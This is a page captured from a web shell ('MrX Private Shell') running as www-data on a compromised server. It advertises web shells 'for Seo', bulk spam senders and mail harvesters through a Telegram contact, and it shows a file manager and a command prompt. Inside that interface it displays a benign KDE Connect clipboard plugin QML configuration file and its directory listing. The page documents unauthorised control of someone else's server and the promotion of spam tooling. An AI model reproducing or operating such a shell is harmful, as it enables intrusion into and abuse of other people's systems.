__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.226: ~ $
/**
 * SPDX-FileCopyrightText: 2022 Yuchen Shi <bolshaya_schists@mail.gravitide.co>
 *
 * SPDX-License-Identifier: GPL-2.0-only OR GPL-3.0-only OR LicenseRef-KDE-Accepted-GPL
 */

import QtQuick 2.15
import QtQuick.Controls 2.15 as QQC2
import QtQuick.Layouts 1.15
import org.kde.kirigami 2.20 as Kirigami
import org.kde.kdeconnect 1.0

Kirigami.ScrollablePage {
    id: root

    property string device

    Component.onCompleted: {
        autoShare.checked = config.getBool("autoShare", config.getBool("sendUnknown", true))
        password.checked = config.getBool("sendPassword", true)
    }

    Kirigami.FormLayout {
        KdeConnectPluginConfig {
            id: config
            deviceId: device
            pluginName: "kdeconnect_clipboard"
        }

        QQC2.CheckBox {
            id: autoShare
            text: i18n("Automatically share the clipboard from this device")
            focus: true
            onClicked: config.set("autoShare", checked)
            KeyNavigation.down: password
        }

        QQC2.CheckBox {
            id: password
            text: i18n("Including passwords (as marked by password managers)")
            onClicked: config.set("sendPassword", checked)
        }
    }
}

Filemanager

Name Type Size Permission Actions
kdeconnect_clipboard_config.qml File 1.2 KB 0644
kdeconnect_findthisdevice_config.qml File 2.41 KB 0644
kdeconnect_pausemusic_config.qml File 1.81 KB 0644
kdeconnect_runcommand_config.qml File 5.2 KB 0644
kdeconnect_sendnotifications_config.qml File 1.75 KB 0644
kdeconnect_share_config.qml File 1.68 KB 0644
Filemanager